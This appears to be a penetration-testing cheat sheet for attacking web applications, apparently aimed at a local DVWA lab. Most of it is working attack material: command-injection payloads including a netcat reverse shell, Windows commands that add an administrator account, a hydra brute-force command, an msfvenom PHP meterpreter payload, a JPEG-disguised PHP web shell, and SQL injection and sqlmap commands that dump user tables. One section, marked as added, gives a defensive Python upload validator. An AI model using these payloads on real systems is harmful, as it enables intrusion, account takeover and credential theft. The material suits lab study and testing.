# Hacking Web Applications and Web Servers

## Command Execution

### Linux

* `127.0.0.1 && ls`
* `127.0.0.1 & ls`
* `127.0.0.1 ; ls`
* `127.0.0.1 | ls` - with space
* `127.0.0.1 |ls` - without space
* `127.0.0.1 && nc -c sh 127.0.0.1 9001`

### Windows

* `hostname`
* `whoami`
* `tasklist`
* `taskkill /PID 3112 /F` - forcefully kills the process with PID 3112
* `dir c:\`
* `net user`
* `net user test /add` - add a new user
* `net localgroup Administrators test /add` - add test user to administrators
* `net user test` - details of the user
* `dir c:\"pin.txt"`
* `type c:\"pin.txt"`

***

## Brute-Forcing

{% code overflow="wrap" %}

```bash
hydra -l admin -P /usr/share/wordlists/john.lst 'http-get-form://127.0.0.1:42001/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=7vs4mhc1q4dnp3f6cgikl01v9q; security=low:F=Username and/or password incorrect'
```

{% endcode %}

***

## File Upload

* `msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php`
* `exploit.php.img` - double-extension filename
* `GIF89a;` - add this line to the start of any file so that magic-byte checks treat it as an image file
* `use multi/handler` - in msfconsole, to catch the connection back

```python
# PHP web shell prefixed with a JPEG header so it sniffs as image/jpeg
with open('shell.php', 'wb') as fh:
    fh.write(b'\xFF\xD8\xFF\xE0' + b'<? passthru($_GET["cmd"]); ?>')
```
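The header trick above works because many upload handlers only sniff the first few bytes. As an added example (not from the original page), a Python validator showing a magic-byte-only check beside a hardened one; the allowlist, function names and the sample files are assumptions for illustration.

```python
import os
import re
import secrets

# Signatures an upload handler typically sniffs. A checker that stops here
# accepts any file that merely begins with one of them (the trick above).
MAGIC = {
    "jpg": b"\xFF\xD8\xFF",
    "jpeg": b"\xFF\xD8\xFF",
    "gif": b"GIF89a",
    "png": b"\x89PNG\r\n\x1a\n",
}

# Constructed samples: a JPEG-header polyglot carrying a PHP tag, and a
# minimal valid 1x1 GIF.
POLYGLOT = b"\xFF\xD8\xFF\xE0" + b"<?php /* constructed */ ?>"
TINY_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")


def weak_is_image(data: bytes) -> bool:
    """Magic-byte check alone: defeated by prepending an image header."""
    return any(data.startswith(sig) for sig in MAGIC.values())


def hardened_accept(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, detail). detail is the reason on rejection or the
    server-chosen storage name on success (never the client's name)."""
    parts = os.path.basename(filename).lower().split(".")
    # Exactly one extension: blocks double extensions such as exploit.php.img
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        return False, "filename must be <name>.<ext> with a single extension"
    ext = parts[1]
    if ext not in MAGIC:
        return False, f"extension .{ext} not in allowlist"
    # Declared type and sniffed type must agree
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    # Coarse polyglot check: image data carrying a PHP or script open tag
    lowered = data.lower()
    if b"<?" in lowered or b"<script" in lowered:
        return False, "embedded script tag inside image data"
    # Store under a random name with the validated extension only
    return True, f"{secrets.token_hex(16)}.{ext}"
```

A production handler would additionally re-encode the image with an imaging library and serve uploads from a directory where the web server never executes scripts.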

***

## SQL Injection

### Manual

{% embed url="https://book.hacktricks.xyz/pentesting-web/sql-injection" %}

* `1' UNION SELECT user, password FROM users#`

### Sqlmap

* `sqlmap -r req.txt --batch`
* `sqlmap -r req.txt --batch --level=5 --risk=3`
* `sqlmap -r req.txt --batch --level=5 --risk=3 --current-db`
* `sqlmap -r req.txt -D dvwa --tables`
* `sqlmap -r req.txt -D dvwa -T users --columns`
* `sqlmap -r req.txt -D dvwa -T users --dump`
